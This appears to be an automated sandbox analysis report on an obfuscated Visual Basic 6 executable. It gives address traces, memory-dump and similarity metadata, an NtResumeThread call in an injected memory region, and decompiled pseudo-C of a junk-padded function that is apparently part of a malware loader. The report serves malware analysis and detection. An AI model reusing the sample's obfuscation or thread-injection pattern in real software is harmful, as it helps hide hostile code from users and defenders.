0x0040fc80
0x0040fc82
0x0040fc85
0x0040fc8c
0x0040fc90
0x0040fc95
0x0040fc9b
0x0040fca2
0x0040fca8
0x0040fcb0
0x0040fcb6
0x0040fcb8
0x0040fcbe
0x0040fcc5
0x0040fcea
0x0040fcea
0x0040fcea
0x0040fcc7
0x0040fcc7
0x0040fccc
0x0040fcd1
0x0040fcd7
0x0040fcdd
0x0040fce2
0x0040fce2
0x0040fcf1
0x0040fcf7
0x0040fcfd
0x0040fd00
0x0040fd06
0x0040fd0a
0x0040fd10
0x0040fd13
0x0040fd18
0x0040fd1f
0x0040fd26
0x0040fd2e
0x0040fd31
0x0040fd35
0x0040fd38
0x0040fd3d
0x0040fd43
0x0040fd49
0x0040fd50
0x0040fd72
0x0040fd72
0x0040fd72
0x0040fd52
0x0040fd52
0x0040fd57
0x0040fd5c
0x0040fd5f
0x0040fd65
0x0040fd6a
0x0040fd6a
0x0040fd79
0x0040fd7f
0x0040fd82
0x0040fd85
0x0040fd8a
0x0040fd8e
0x0040fd94
0x0040fd99
0x0040fd9c
0x0040fd9f
0x0040fda4
0x0040fdaa
0x0040fdac
0x0040fdb2
0x0040fdb9
0x0040fddb
0x0040fddb
0x0040fddb
0x0040fdbb
0x0040fdbb
0x0040fdc0
0x0040fdc5
0x0040fdc8
0x0040fdce
0x0040fdd3
0x0040fdd3
0x0040fde2
0x0040fde2
0x0040fdec
0x0040fdf6
0x0040fdf9
0x0040fdfa
0x0040fe00
0x0040fe01
0x0040fe04
0x0040fe05
0x0040fe0a
0x0040fe0c
0x0040fe0f
0x0040fe14
0x0040fe1e
0x0040fe28
0x0040fe2b
0x0040fe2c
0x0040fe32
0x0040fe33
0x0040fe38
0x0040fe3b
0x0040fe3d
0x00000000
0x00000000
0x0040fe3f
0x0040fe41
0x0040fe46
0x0040fe47
0x0040fe47
0x00401827
0x00000000
0x00000000
0x00401829
0x0040182a
0x00000000
0x00000000
0x0040182d
0x0040182d
0x0040182d
0x00401831
0x00000000
0x00000000
0x00401833
0x00000000
0x00000000
0x00401835
0x0040183c
0x0040183d
0x0040183e
0x0040183f
0x00401840
0x00401841
0x00401843
0x00401846
0x00401848
0x00000000
0x00401848
0x00401823
0x00401795
0x0040179b
0x0040179c
0x004017a1
0x004017a3
0x004017a6
0x004017a6
0x004017a7
0x004017a7
0x004017a7
0x004017a7
0x004017a9
0x004017a9
0x004017aa
0x004017af
0x004017b1
0x004017b3
0x004017b5
0x004017b7
0x004017b7
0x004017b9
0x004017b9
0x004017bb
0x004017be
0x004017c0
0x004017c2
0x004017c4
0x004017c6
0x004017c8
0x004017ca
0x004017cc
0x004017cf
0x004017d1
0x004017d3
0x004017d5
0x004017d7
0x004017de
0x004017e0
0x004017e2
0x004017e4
0x004017e6
0x004017e8
0x004017ea
0x004017ea
0x004017ec
0x004017ee
0x00000000
0x004017ee
0x0040175a
0x0040175c
0x0040175e
0x0040175e
0x00401761
0x00401762
0x00401762
0x00401764
0x00401766
0x0040176a
0x0040176b
0x0040176c
0x0040176d
0x0040176e
0x0040176f
0x00401770
0x00401771
0x00401772
0x00401773
0x00401774
0x00401775
0x00401776
0x00401777
0x00401779
0x00401779
0x0040177a
0x0040177a
0x0040177c
0x0040177c
0x0040177d
0x0040177d
0x00401780
0x00401786
0x00401787
0x00401788
0x00401788
0x00000000
0x00401788
0x004016e3
0x004016e6
0x004016e8
0x004016e9
0x004016ea
0x004016f0
0x004016f2
0x004016f4
0x004016f5
0x004016f7
0x004016f9
0x004016fb
0x004016fc
0x004016fd
0x004016fe
0x004016fe
0x004016ff
0x00401700
0x00401700
0x00401701
0x00401704
0x00401706
0x00401706
0x0040170b
0x0040170e
0x0040170f
0x00000000
0x00000000
0x00401711
0x00401714
0x00401716
0x00401718
0x0040171b
0x00401720
0x00401722
0x00401724
0x00401726
0x00401728
0x00401728
0x0040172e
0x00000000
0x00401730
0x00401730
0x00401732
0x00401732
0x00401734
0x00401735
0x00401737
0x0040173c
0x0040173e
0x0040173e
0x0040173f
0x00401740
0x00000000
0x00401742
0x00401742
0x00000000
0x00000000
0x00401744
0x00000000
0x00000000
0x00401746
0x00000000
0x00000000
0x00401748
0x00401748
0x00401749
0x00401749
0x0040174b
0x0040174d
0x0040174f
0x0040174f
0x00000000
0x0040174f
0x00401740
0x0040172e
0x0040167c
0x004016df
0x004016df
0x00000000
0x004016df
0x0040167e
0x00401682
0x00401682
0x00401689
0x0040168b
0x0040168d
0x00401690
0x00401692
0x00401694
0x00401694
0x00401694
0x00401697
0x00401699
0x00000000
0x0040169b
0x0040169b
0x00000000
0x00000000
0x0040169d
0x004016a1
0x004016a1
0x004016a8
0x004016aa
0x004016af
0x004016b5
0x004016b7
0x004016b8
0x004016b9
0x004016bb
0x004016bc
0x004016bf
0x004016c1
0x004016c3
0x004016c5
0x004016c7
0x004016ca
0x004016cb
0x004016cc
0x004016cd
0x004016ce
0x004016d1
0x004016d1
0x004016d3
0x004016d5
0x00000000
0x004016d7
0x004016d7
0x004016d7
0x004016db
0x00000000
0x00000000
0x004016de
0x004016de
0x00000000
0x004016de
0x004016d5
0x00401699
0x004015a6
0x004015a7
0x004015aa

APIs

#100.MSVBVM60(VB5!6&*), ref: 004015BD

Strings

VB5!6&*, xrefs: 004017A8, 004015B8, 0040161F

Memory Dump Source

Source File: 00000000.00000002.686342372.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686338365.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686356771.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686361470.0000000000415000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: aeb2b9f9adf997c7283892a0024e3f1d98c1b8d9f5d877b2e23f21a2544bf494
Instruction ID: 6753d9f71a9ab694b893317632a7c1c63fd07aef3ca90c0744ff6cec45ffd7e1
Opcode Fuzzy Hash: aeb2b9f9adf997c7283892a0024e3f1d98c1b8d9f5d877b2e23f21a2544bf494
Instruction Fuzzy Hash: 09E10F6144E3C29FC31387704CA56A57FB0AE1322471E86EBD4D5CF0E3D22C995AC766

Uniqueness

Uniqueness Score: -1.00%

Function 0040827D, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 285COMMON

Download Yara Rule

Strings

"1, xrefs: 004082EC

Memory Dump Source

Source File: 00000000.00000002.686342372.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686338365.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686356771.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686361470.0000000000415000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: "1
API String ID: 0-3082114277
Opcode ID: 14ba0bed177b0625aa9e9e8683280917df8c061228728fbc55e4d3432fa01144
Instruction ID: 7fd6d5191524c29829e92bf75306a699616c19c2616b31a755f6597cf791a085
Opcode Fuzzy Hash: 14ba0bed177b0625aa9e9e8683280917df8c061228728fbc55e4d3432fa01144
Instruction Fuzzy Hash: 89913563F1971285FF721428CAD05AE6613DBC2300F36863BCDAA778C59B3E4AC65247

Uniqueness

Uniqueness Score: -1.00%

Function 022E384F, Relevance: 1.6, APIs: 1, Instructions: 97nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 022E393F

Memory Dump Source

Source File: 00000000.00000002.686742043.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 065a3b5015acbc39af975e75c0a9d3e9e38ca8c112972e1223c61794163c8447
Instruction ID: 1f6f5c5cce1d66284335884dcea6c61fe19df7ab16bb205e9415d05839099f1d
Opcode Fuzzy Hash: 065a3b5015acbc39af975e75c0a9d3e9e38ca8c112972e1223c61794163c8447
Instruction Fuzzy Hash: 95310531620607DFEF39EE68C5583A436A2AF22335FE942A9CC57C74A9D334C8C68601

Uniqueness

Uniqueness Score: -1.00%

Function 0040EFC1, Relevance: 154.9, APIs: 81, Strings: 7, Instructions: 905
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040EFC1(signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v32;
				char _v48;
				intOrPtr _v52;
				signed int _v56;
				signed int _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v116;
				char _v132;
				intOrPtr _v140;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				void* _v164;
				char _v168;
				char _v172;
				char _v176;
				intOrPtr _v180;
				char _v184;
				signed int _v188;
				signed int _v192;
				intOrPtr* _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				intOrPtr* _v244;
				signed int _v248;
				intOrPtr* _v252;
				signed int _v256;
				intOrPtr* _v260;
				signed int _v264;
				signed int _v268;
				intOrPtr* _v272;
				signed int _v276;
				intOrPtr* _v280;
				signed int _v284;
				intOrPtr* _v288;
				signed int _v292;
				intOrPtr* _v296;
				signed int _v300;
				intOrPtr* _v304;
				signed int _v308;
				intOrPtr* _v312;
				signed int _v316;
				signed int _v320;
				intOrPtr* _v324;
				signed int _v328;
				intOrPtr* _v332;
				signed int _v336;
				intOrPtr* _v340;
				signed int _v344;
				intOrPtr* _v348;
				signed int _v352;
				intOrPtr* _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _t436;
				signed int _t440;
				char* _t445;
				signed int _t449;
				signed int _t453;
				signed int _t457;
				char* _t462;
				signed int _t466;
				signed int _t475;
				signed int _t479;
				char* _t483;
				signed int _t487;
				signed int _t499;
				signed int _t503;
				char* _t508;
				signed int _t512;
				signed int _t517;
				signed int _t521;
				signed int _t525;
				signed int _t529;
				char* _t533;
				char* _t534;
				signed int _t538;
				signed int _t553;
				signed int _t557;
				char* _t561;
				signed int _t565;
				signed int _t570;
				signed int _t574;
				char* _t580;
				signed int _t596;
				signed int _t600;
				char* _t604;
				signed int _t608;
				signed int _t615;
				signed int _t620;
				char* _t625;
				void* _t627;
				signed int* _t645;
				signed int* _t661;
				signed int* _t682;
				void* _t695;
				void* _t696;
				intOrPtr _t698;
				void* _t699;
				void* _t700;
				void* _t701;
				void* _t702;
				void* _t703;
				void* _t706;
				void* _t707;
				long long* _t709;
				char _t744;

				 *[fs:0x0] = _t698;
				L00401340();
				_v16 = _t698;
				_v12 = 0x401278;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, _t695, _t696, _t627,  *[fs:0x0], 0x401346);
				asm("fldz");
				_push(_t628);
				_v48 = _t744;
				L004014AE();
				L004014B4();
				asm("fcomp qword [0x401270]");
				if( *0x413010 != 0) {
					_v244 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x401de0);
					L00401592();
					_v244 = 0x413010;
				}
				_t436 =  &_v80;
				L00401598();
				_v188 = _t436;
				_t440 =  *((intOrPtr*)( *_v188 + 0x158))(_v188,  &_v84, _t436,  *((intOrPtr*)( *((intOrPtr*)( *_v244)) + 0x2fc))( *_v244));
				asm("fclex");
				_v192 = _t440;
				if(_v192 >= 0) {
					_v248 = _v248 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x403c78);
					_push(_v188);
					_push(_v192);
					L0040158C();
					_v248 = _t440;
				}
				_push(0);
				_push(0);
				_push(_v84);
				_push( &_v116);
				L00401574();
				_t699 = _t698 + 0x10;
				if( *0x413010 != 0) {
					_v252 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x401de0);
					L00401592();
					_v252 = 0x413010;
				}
				_t445 =  &_v88;
				L00401598();
				_v196 = _t445;
				_t449 =  *((intOrPtr*)( *_v196 + 0x130))(_v196,  &_v152, _t445,  *((intOrPtr*)( *((intOrPtr*)( *_v252)) + 0x304))( *_v252));
				asm("fclex");
				_v200 = _t449;
				if(_v200 >= 0) {
					_v256 = _v256 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x403aa8);
					_push(_v196);
					_push(_v200);
					L0040158C();
					_v256 = _t449;
				}
				if( *0x413010 != 0) {
					_v260 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x401de0);
					L00401592();
					_v260 = 0x413010;
				}
				_t453 =  &_v92;
				L00401598();
				_v204 = _t453;
				_t457 =  *((intOrPtr*)( *_v204 + 0x98))(_v204,  &_v156, _t453,  *((intOrPtr*)( *((intOrPtr*)( *_v260)) + 0x2fc))( *_v260));
				asm("fclex");
				_v208 = _t457;
				if(_v208 >= 0) {
					_v264 = _v264 & 0x00000000;
				} else {
					_push(0x98);
					_push(0x403c78);
					_push(_v204);
					_push(_v208);
					L0040158C();
					_v264 = _t457;
				}
				_v160 = _v156;
				_v168 = 0x5fb7d4;
				_v184 = 0xc002e180;
				_v180 = 0x5afd;
				_t462 =  &_v116;
				L0040157A();
				_t466 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v184, 0x459b4a, _t462, _t462,  &_v168, 0x535, L"ERGODIC", _v152,  &_v160,  &_v164);
				_v212 = _t466;
				if(_v212 >= 0) {
					_v268 = _v268 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x402478);
					_push(_a4);
					_push(_v212);
					L0040158C();
					_v268 = _t466;
				}
				_v32 = _v164;
				_push( &_v84);
				_push( &_v92);
				_push( &_v88);
				_push( &_v80);
				_push(4);
				L00401568();
				_t700 = _t699 + 0x14;
				L00401562();
				if( *0x413010 != 0) {
					_v272 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x401de0);
					L00401592();
					_v272 = 0x413010;
				}
				_t475 =  &_v80;
				L00401598();
				_v188 = _t475;
				_t479 =  *((intOrPtr*)( *_v188 + 0x190))(_v188,  &_v152, _t475,  *((intOrPtr*)( *((intOrPtr*)( *_v272)) + 0x300))( *_v272));
				asm("fclex");
				_v192 = _t479;
				if(_v192 >= 0) {
					_v276 = _v276 & 0x00000000;
				} else {
					_push(0x190);
					_push(0x403c78);
					_push(_v188);
					_push(_v192);
					L0040158C();
					_v276 = _t479;
				}
				if( *0x413010 != 0) {
					_v280 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x401de0);
					L00401592();
					_v280 = 0x413010;
				}
				_t483 =  &_v84;
				L00401598();
				_v196 = _t483;
				_t487 =  *((intOrPtr*)( *_v196 + 0x68))(_v196,  &_v168, _t483,  *((intOrPtr*)( *((intOrPtr*)( *_v280)) + 0x2fc))( *_v280));
				asm("fclex");
				_v200 = _t487;
				if(_v200 >= 0) {
					_v284 = _v284 & 0x00000000;
				} else {
					_push(0x68);
					_push(0x403c78);
					_push(_v196);
					_push(_v200);
					L0040158C();
					_v284 = _t487;
				}
				_v156 = 0x4d1e;
				_v172 = 0x56a744;
				_t645 =  &_v56;
				L00401556();
				_v200 = _v168;
				_v212 =  *0x401268;
				 *((intOrPtr*)( *_a4 + 0x70c))(_a4, _v152, 0x44f6, L"Caingang", L"HEPATOPHYMA",  &_v56, _t645, _t645,  &_v172, _t645,  &_v156);
				L00401538();
				_push( &_v84);
				_push( &_v80);
				_push(2);
				L00401568();
				_t701 = _t700 + 0xc;
				if( *0x413010 != 0) {
					_v288 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x401de0);
					L00401592();
					_v288 = 0x413010;
				}
				_t499 =  &_v80;
				L00401598();
				_v188 = _t499;
				_t503 =  *((intOrPtr*)( *_v188 + 0x130))(_v188,  &_v84, _t499,  *((intOrPtr*)( *((intOrPtr*)( *_v288)) + 0x300))( *_v288));
				asm("fclex");
				_v192 = _t503;
				if(_v192 >= 0) {
					_v292 = _v292 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x403c78);
					_push(_v188);
					_push(_v192);
					L0040158C();
					_v292 = _t503;
				}
				_push(0);
				_push(0);
				_push(_v84);
				_push( &_v116); // executed
				L00401574(); // executed
				_t702 = _t701 + 0x10;
				if( *0x413010 != 0) {
					_v296 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x401de0);
					L00401592();
					_v296 = 0x413010;
				}
				_t508 =  &_v88;
				L00401598();
				_v196 = _t508;
				_t512 =  *((intOrPtr*)( *_v196 + 0x158))(_v196,  &_v92, _t508,  *((intOrPtr*)( *((intOrPtr*)( *_v296)) + 0x2fc))( *_v296));
				asm("fclex");
				_v200 = _t512;
				if(_v200 >= 0) {
					_v300 = _v300 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x403c78);
					_push(_v196);
					_push(_v200);
					L0040158C();
					_v300 = _t512;
				}
				_push(0);
				_push(0);
				_push(_v92);
				_push( &_v132);
				L00401574();
				_t703 = _t702 + 0x10;
				if( *0x413010 != 0) {
					_v304 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x401de0);
					L00401592();
					_v304 = 0x413010;
				}
				_t517 =  &_v96;
				L00401598();
				_v204 = _t517;
				_t521 =  *((intOrPtr*)( *_v204 + 0x120))(_v204,  &_v168, _t517,  *((intOrPtr*)( *((intOrPtr*)( *_v304)) + 0x2fc))( *_v304));
				asm("fclex");
				_v208 = _t521;
				if(_v208 >= 0) {
					_v308 = _v308 & 0x00000000;
				} else {
					_push(0x120);
					_push(0x403c78);
					_push(_v204);
					_push(_v208);
					L0040158C();
					_v308 = _t521;
				}
				if( *0x413010 != 0) {
					_v312 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x401de0);
					L00401592();
					_v312 = 0x413010;
				}
				_t525 =  &_v100;
				L00401598();
				_v212 = _t525;
				_t529 =  *((intOrPtr*)( *_v212 + 0x80))(_v212,  &_v172, _t525,  *((intOrPtr*)( *((intOrPtr*)( *_v312)) + 0x300))( *_v312));
				asm("fclex");
				_v216 = _t529;
				if(_v216 >= 0) {
					_v316 = _v316 & 0x00000000;
				} else {
					_push(0x80);
					_push(0x403c78);
					_push(_v212);
					_push(_v216);
					L0040158C();
					_v316 = _t529;
				}
				L00401556();
				_v176 = _v172;
				L00401556();
				_v184 =  *0x401260;
				_t533 =  &_v132;
				L0040157A();
				_t534 =  &_v116;
				L004014D2();
				_t661 =  &_v56;
				L00401508();
				_v360 =  *0x401258;
				_t538 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4, _t661, _t661,  &_v184, _t534, _t534, _t533, _t533,  &_v60, _v168,  &_v176,  &_v64);
				_v220 = _t538;
				if(_v220 >= 0) {
					_v320 = _v320 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x402478);
					_push(_a4);
					_push(_v220);
					L0040158C();
					_v320 = _t538;
				}
				_push( &_v64);
				_push( &_v60);
				_push( &_v56);
				_push(3);
				L0040156E();
				_push( &_v92);
				_push( &_v84);
				_push( &_v100);
				_push( &_v96);
				_push( &_v88);
				_push( &_v80);
				_push(6);
				L00401568();
				_push( &_v132);
				_push( &_v116);
				_push(2);
				L0040153E();
				_t706 = _t703 + 0x38;
				if( *0x413010 != 0) {
					_v324 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x401de0);
					L00401592();
					_v324 = 0x413010;
				}
				_t553 =  &_v80;
				L00401598();
				_v188 = _t553;
				_t557 =  *((intOrPtr*)( *_v188 + 0x110))(_v188,  &_v56, _t553,  *((intOrPtr*)( *((intOrPtr*)( *_v324)) + 0x2fc))( *_v324));
				asm("fclex");
				_v192 = _t557;
				if(_v192 >= 0) {
					_v328 = _v328 & 0x00000000;
				} else {
					_push(0x110);
					_push(0x403c78);
					_push(_v188);
					_push(_v192);
					L0040158C();
					_v328 = _t557;
				}
				if( *0x413010 != 0) {
					_v332 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x401de0);
					L00401592();
					_v332 = 0x413010;
				}
				_t561 =  &_v84;
				L00401598();
				_v196 = _t561;
				_t565 =  *((intOrPtr*)( *_v196 + 0x1b8))(_v196,  &_v88, _t561,  *((intOrPtr*)( *((intOrPtr*)( *_v332)) + 0x308))( *_v332));
				asm("fclex");
				_v200 = _t565;
				if(_v200 >= 0) {
					_v336 = _v336 & 0x00000000;
				} else {
					_push(0x1b8);
					_push(0x403aa8);
					_push(_v196);
					_push(_v200);
					L0040158C();
					_v336 = _t565;
				}
				_push(0);
				_push(0);
				_push(_v88);
				_push( &_v116);
				L00401574();
				_t707 = _t706 + 0x10;
				if( *0x413010 != 0) {
					_v340 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x401de0);
					L00401592();
					_v340 = 0x413010;
				}
				_t570 =  &_v92;
				L00401598();
				_v204 = _t570;
				_t574 =  *((intOrPtr*)( *_v204 + 0x158))(_v204,  &_v60, _t570,  *((intOrPtr*)( *((intOrPtr*)( *_v340)) + 0x304))( *_v340));
				asm("fclex");
				_v208 = _t574;
				if(_v208 >= 0) {
					_v344 = _v344 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x403aa8);
					_push(_v204);
					_push(_v208);
					L0040158C();
					_v344 = _t574;
				}
				_v232 = _v60;
				_v60 = _v60 & 0x00000000;
				L00401508();
				_v168 =  *0x401250;
				L00401556();
				_v236 = _v56;
				_v56 = _v56 & 0x00000000;
				L00401508();
				_t580 =  &_v116;
				L004014D2();
				L00401508();
				 *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v64, _t580, _t580,  &_v72,  &_v168,  &_v76, 0x484f2760, 0x5afe);
				_push( &_v76);
				_push( &_v72);
				_push( &_v68);
				_push( &_v64);
				_push(4);
				L0040156E();
				_push( &_v88);
				_push( &_v92);
				_push( &_v84);
				_push( &_v80);
				_push(4);
				L00401568();
				_t709 = _t707 + 0x28;
				L00401562();
				if( *0x413010 != 0) {
					_v348 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x401de0);
					L00401592();
					_v348 = 0x413010;
				}
				_t596 =  &_v80;
				L00401598();
				_v188 = _t596;
				_t600 =  *((intOrPtr*)( *_v188 + 0x50))(_v188,  &_v56, _t596,  *((intOrPtr*)( *((intOrPtr*)( *_v348)) + 0x30c))( *_v348));
				asm("fclex");
				_v192 = _t600;
				if(_v192 >= 0) {
					_v352 = _v352 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x403e24);
					_push(_v188);
					_push(_v192);
					L0040158C();
					_v352 = _t600;
				}
				if( *0x413010 != 0) {
					_v356 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x401de0);
					L00401592();
					_v356 = 0x413010;
				}
				_t604 =  &_v84;
				L00401598();
				_v196 = _t604;
				_t608 =  *((intOrPtr*)( *_v196 + 0x88))(_v196,  &_v168, _t604,  *((intOrPtr*)( *((intOrPtr*)( *_v356)) + 0x30c))( *_v356));
				asm("fclex");
				_v200 = _t608;
				if(_v200 >= 0) {
					_v360 = _v360 & 0x00000000;
				} else {
					_push(0x88);
					_push(0x403e24);
					_push(_v196);
					_push(_v200);
					L0040158C();
					_v360 = _t608;
				}
				_v172 = _v168;
				_v240 = _v56;
				_v56 = _v56 & 0x00000000;
				_t682 =  &_v60;
				L00401508();
				 *_t709 =  *0x401248;
				_t615 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v60, _t682, _t682,  &_v172,  &_v176);
				_v204 = _t615;
				if(_v204 >= 0) {
					_v364 = _v364 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x402478);
					_push(_a4);
					_push(_v204);
					L0040158C();
					_v364 = _t615;
				}
				_v52 = _v176;
				L00401538();
				L00401568();
				_t620 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 2,  &_v80,  &_v84);
				asm("fclex");
				_v188 = _t620;
				if(_v188 >= 0) {
					_v368 = _v368 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x402448);
					_push(_a4);
					_push(_v188);
					L0040158C();
					_v368 = _t620;
				}
				while(1) {
					_v140 = 1;
					_v148 = 2;
					_push( &_v48);
					_push( &_v148);
					_push( &_v116);
					L004014A2();
					L004014A8();
					_v140 = 0x2ffff;
					_v148 = 0x8003;
					_push( &_v48);
					_t625 =  &_v148;
					_push(_t625);
					L0040149C();
					if(_t625 == 0) {
						break;
					}
				}
				_push(0x4082db);
				goto ( *__esp);
			}

0x0040efd3
0x0040efdf
0x0040efe7
0x0040efea
0x0040eff7
0x0040f000
0x0040f00b
0x0040f00e
0x0040f011
0x0040f012
0x0040f015
0x0040f01a
0x0040f01f
0x0040f02c
0x0040f049
0x0040f02e
0x0040f02e
0x0040f033
0x0040f038
0x0040f03d
0x0040f03d
0x0040f06d
0x0040f071
0x0040f076
0x0040f08e
0x0040f094
0x0040f096
0x0040f0a3
0x0040f0c8
0x0040f0a5
0x0040f0a5
0x0040f0aa
0x0040f0af
0x0040f0b5
0x0040f0bb
0x0040f0c0
0x0040f0c0
0x0040f0cf
0x0040f0d1
0x0040f0d3
0x0040f0d9
0x0040f0da
0x0040f0df
0x0040f0e9
0x0040f106
0x0040f0eb
0x0040f0eb
0x0040f0f0
0x0040f0f5
0x0040f0fa
0x0040f0fa
0x0040f12a
0x0040f12e
0x0040f133
0x0040f14e
0x0040f154
0x0040f156
0x0040f163
0x0040f188
0x0040f165
0x0040f165
0x0040f16a
0x0040f16f
0x0040f175
0x0040f17b
0x0040f180
0x0040f180
0x0040f196
0x0040f1b3
0x0040f198
0x0040f198
0x0040f19d
0x0040f1a2
0x0040f1a7
0x0040f1a7
0x0040f1d7
0x0040f1db
0x0040f1e0
0x0040f1fb
0x0040f201
0x0040f203
0x0040f210
0x0040f235
0x0040f212
0x0040f212
0x0040f217
0x0040f21c
0x0040f222
0x0040f228
0x0040f22d
0x0040f22d
0x0040f243
0x0040f24a
0x0040f254
0x0040f25e
0x0040f28d
0x0040f291
0x0040f2ab
0x0040f2b1
0x0040f2be
0x0040f2e0
0x0040f2c0
0x0040f2c0
0x0040f2c5
0x0040f2ca
0x0040f2cd
0x0040f2d3
0x0040f2d8
0x0040f2d8
0x0040f2ee
0x0040f2f5
0x0040f2f9
0x0040f2fd
0x0040f301
0x0040f302
0x0040f304
0x0040f309
0x0040f30f
0x0040f31b
0x0040f338
0x0040f31d
0x0040f31d
0x0040f322
0x0040f327
0x0040f32c
0x0040f32c
0x0040f35c
0x0040f360
0x0040f365
0x0040f380
0x0040f386
0x0040f388
0x0040f395
0x0040f3ba
0x0040f397
0x0040f397
0x0040f39c
0x0040f3a1
0x0040f3a7
0x0040f3ad
0x0040f3b2
0x0040f3b2
0x0040f3c8
0x0040f3e5
0x0040f3ca
0x0040f3ca
0x0040f3cf
0x0040f3d4
0x0040f3d9
0x0040f3d9
0x0040f409
0x0040f40d
0x0040f412
0x0040f42d
0x0040f430
0x0040f432
0x0040f43f
0x0040f461
0x0040f441
0x0040f441
0x0040f443
0x0040f448
0x0040f44e
0x0040f454
0x0040f459
0x0040f459
0x0040f468
0x0040f471
0x0040f480
0x0040f483
0x0040f496
0x0040f4a8
0x0040f4cc
0x0040f4d5
0x0040f4dd
0x0040f4e1
0x0040f4e2
0x0040f4e4
0x0040f4e9
0x0040f4f3
0x0040f510
0x0040f4f5
0x0040f4f5
0x0040f4fa
0x0040f4ff
0x0040f504
0x0040f504
0x0040f534
0x0040f538
0x0040f53d
0x0040f555
0x0040f55b
0x0040f55d
0x0040f56a
0x0040f58f
0x0040f56c
0x0040f56c
0x0040f571
0x0040f576
0x0040f57c
0x0040f582
0x0040f587
0x0040f587
0x0040f596
0x0040f598
0x0040f59a
0x0040f5a0
0x0040f5a1
0x0040f5a6
0x0040f5b0
0x0040f5cd
0x0040f5b2
0x0040f5b2
0x0040f5b7
0x0040f5bc
0x0040f5c1
0x0040f5c1
0x0040f5f1
0x0040f5f5
0x0040f5fa
0x0040f612
0x0040f618
0x0040f61a
0x0040f627
0x0040f64c
0x0040f629
0x0040f629
0x0040f62e
0x0040f633
0x0040f639
0x0040f63f
0x0040f644
0x0040f644
0x0040f653
0x0040f655
0x0040f657
0x0040f65d
0x0040f65e
0x0040f663
0x0040f66d
0x0040f68a
0x0040f66f
0x0040f66f
0x0040f674
0x0040f679
0x0040f67e
0x0040f67e
0x0040f6ae
0x0040f6b2
0x0040f6b7
0x0040f6d2
0x0040f6d8
0x0040f6da
0x0040f6e7
0x0040f70c
0x0040f6e9
0x0040f6e9
0x0040f6ee
0x0040f6f3
0x0040f6f9
0x0040f6ff
0x0040f704
0x0040f704
0x0040f71a
0x0040f737
0x0040f71c
0x0040f71c
0x0040f721
0x0040f726
0x0040f72b
0x0040f72b
0x0040f75b
0x0040f75f
0x0040f764
0x0040f77f
0x0040f785
0x0040f787
0x0040f794
0x0040f7b9
0x0040f796
0x0040f796
0x0040f79b
0x0040f7a0
0x0040f7a6
0x0040f7ac
0x0040f7b1
0x0040f7b1
0x0040f7c8
0x0040f7d3
0x0040f7e1
0x0040f7ec
0x0040f807
0x0040f80b
0x0040f811
0x0040f815
0x0040f81c
0x0040f81f
0x0040f834
0x0040f83f
0x0040f845
0x0040f852
0x0040f874
0x0040f854
0x0040f854
0x0040f859
0x0040f85e
0x0040f861
0x0040f867
0x0040f86c
0x0040f86c
0x0040f87e
0x0040f882
0x0040f886
0x0040f887
0x0040f889
0x0040f894
0x0040f898
0x0040f89c
0x0040f8a0
0x0040f8a4
0x0040f8a8
0x0040f8a9
0x0040f8ab
0x0040f8b6
0x0040f8ba
0x0040f8bb
0x0040f8bd
0x0040f8c2
0x0040f8cc
0x0040f8e9
0x0040f8ce
0x0040f8ce
0x0040f8d3
0x0040f8d8
0x0040f8dd
0x0040f8dd
0x0040f90d
0x0040f911
0x0040f916
0x0040f92e
0x0040f934
0x0040f936
0x0040f943
0x0040f968
0x0040f945
0x0040f945
0x0040f94a
0x0040f94f
0x0040f955
0x0040f95b
0x0040f960
